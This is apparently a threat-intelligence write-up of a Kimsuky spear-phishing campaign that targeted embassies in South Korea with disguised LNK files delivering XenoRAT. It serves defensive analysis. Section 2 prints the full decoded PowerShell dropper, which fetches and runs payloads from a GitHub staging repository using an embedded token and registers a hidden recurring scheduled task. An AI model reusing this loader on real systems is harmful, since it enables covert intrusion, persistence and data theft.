North Korean-linked hackers conducted espionage operations for several months this spring, targeting diplomatic missions and abusing GitHub to distribute malware and covertly control infected systems.
Another North Korean-run organization was also found to have infiltrated more than 320 companies worldwide by impersonating remote IT staff.
Spear-phishing emails were sent to diplomatic missions and Ministry of Foreign Affairs personnel.
These emails impersonated real diplomats and international organizations, and were sent around the same time as legitimate summits and forums.
The compressed files contained Windows LNK files disguised as PDFs, which, when executed, triggered PowerShell commands that downloaded malicious payloads from GitHub.
The final malware deployed was a remote-control program called MoonPeak, a modified version of the open-source XenoRAT. MoonPeak is capable of system control and information theft.
The attack resembled tactics long associated with the North Korean hacking group Kimsuky, though the timeline and some traces also overlapped with China.
1. Overview
On the 20th, major foreign media outlets reported that the North Korean state-backed hacking group Kimsuky (APT43) carried out a “XenoRAT” malware campaign against embassies located in South Korea.
Source: Trellix Report
XenoRAT is a Trojan malware that can be used as a zombie PC once infected, enabling attackers to deliver commands such as keylogging, screenshot capture, webcam access, and remote shell execution.
This section analyzes the malware distribution method recently used by the Kimsuky group in its attacks against foreign embassies in South Korea.
The overall infection chain is as follows:
Source: Trellix Report
Initial Vector – Phishing: The attack began with spear-phishing emails targeting embassy staff and Ministry of Foreign Affairs employees in South Korea. The attackers impersonated senior diplomats of the EU delegation and sent emails with ZIP attachments.
A common element in all emails was a double-extension file (test.pdf.lnk) disguised with a PDF icon or filename inside the ZIP.
Payload Delivery – Password Protected ZIP: To evade malware detection, the ZIP files were password-protected before being sent.
Execution – PowerShell: When the malicious LNK file was executed, it launched an embedded PowerShell command. Acting as a dropper, the LNK file contained Base64-encoded strings that, when executed, accessed a GitHub repository to download additional files (XenoRAT) and registered scheduled tasks.
2. LNK File Analysis
The internal structure of the LNK file is shown above. The LNK file signature begins with 0x4C 0x00 0x00 0x00. At offset 0xD4, the PowerShell path can be identified, recorded as a relative path.
The COMMAND_LINE_ARGUMENTS section reveals the input parameters used when executing PowerShell.
Breaking down the behavior of the PowerShell script step by step:
A. Decoding and Preparation for Execution
The Base64 string decodes to the following command sequence:
$hhh=Join-Path ([System.IO.Path]::GetTempPath()) "Urgent Letter from the Ambassador Embassy of Poland.pdf";$tkf="gh"+"p_9"+"f"+"x"+"xSJ"+"M"+"M"+"vI"+"hd"+"W"+"IK"+"v"+"t"+"zY"+"x"+"w6"+"LX"+"jE"+"i"+"F"+"Nj"+"4UU"+"tv"+"X";$bstr="h"+"tt"+"p"+"s:"+"/"+"/"+"r"+"aw"+".gi"+"thu"+"buser"+"c"+"o"+"ntent."+"com/lan"+"d"+"jhon"+"/"+"gre"+"en/ma"+"in/";$rstr=$bstr+"tmp.pdf";$hrs = @{Authorization="token $tkf";srjidc="dsghjkgekjhgegegegr";Accept="application/vnd.github.v3.raw"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($env:AppData) "chrome.ps1"; $str = '$aaa = Join-Path ($env:AppData) "temp.ps1"; $bsp="'+$bstr+'ofx.txt";$hsp=@{Authorization="token '+$tkf+'";frjc="hdjgERErit783tiu";Accept="application/vnd.github.v3.raw"};Invoke-WebRequest -Uri $bsp -Headers $hsp -OutFile $aaa;& $aaa; Remove-Item -Path $aaa -Force;'; $str | Out-File -FilePath $ppp -Encoding UTF8; $action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"'; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "Microrfterterewuntecongratulaterupolandintujectioperupdate" -Action $action -Trigger $trigger -Settings $settings;$aaa = Join-Path ($env:AppData) "system_first.ps1";$rstr=$bstr+"onf.txt";Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $aaa;& $aaa; Remove-Item -Path $aaa -Force;
Save the decoded content as a .ps1 file in the temporary folder.
Execute it with PowerShell using hidden window and bypass options.
B. C2 Communication
The malware utilized GitHub Raw (remote repositories) as a malware distribution infrastructure.
https://raw.githubusercontent.com/landjhon/green/main/
From here, it downloaded files such as tmp.pdf, ofx.txt, and onf.txt into temporary folders.
C. File Execution
The files retrieved via C2 communication were renamed and executed as follows:
- tmp.pdf → Urgent Letter from the Ambassador Embassy of Poland.pdf
- ofx.txt → temp.ps1
- onf.txt → system_first.ps1
The PDF served as a decoy to distract the victim, while temp.ps1 likely downloaded additional malicious files (believed to be XenoRAT).
The system_first.ps1 file was only executed once upon download, gathering system information from the victim PC and transmitting it to the attacker.
D. Persistence
A file named chrome.ps1 was created in %AppData%. This acted as a downloader, repeatedly fetching and executing ofx.txt.
A scheduled task was registered under the obscure name “Microrfterterewuntecongratulaterupolandintujectioperupdate,” set to begin five minutes later and repeat every 30 minutes.
E. Cleanup
Downloaded scripts (temp.ps1, system_first.ps1) were deleted immediately after execution.
3. Mitigation
Defensive measures should include network blocking, endpoint detection and response (EDR) with monitoring of GitHub addresses, timely security solution updates, and reinforced security policies.
Additionally:
- Restrict PowerShell execution policies
- Minimize Windows user privileges
- Provide security awareness training for employees on suspicious emails
These steps help reduce human error and prevent the spread of malicious activity.
4. Conclusion
The Kimsuky group has recently adopted LNK files as a means of downloading and executing additional malware from GitHub. To counter these threats, it is most effective to combine behavior-based defenses with IOC-based defenses.
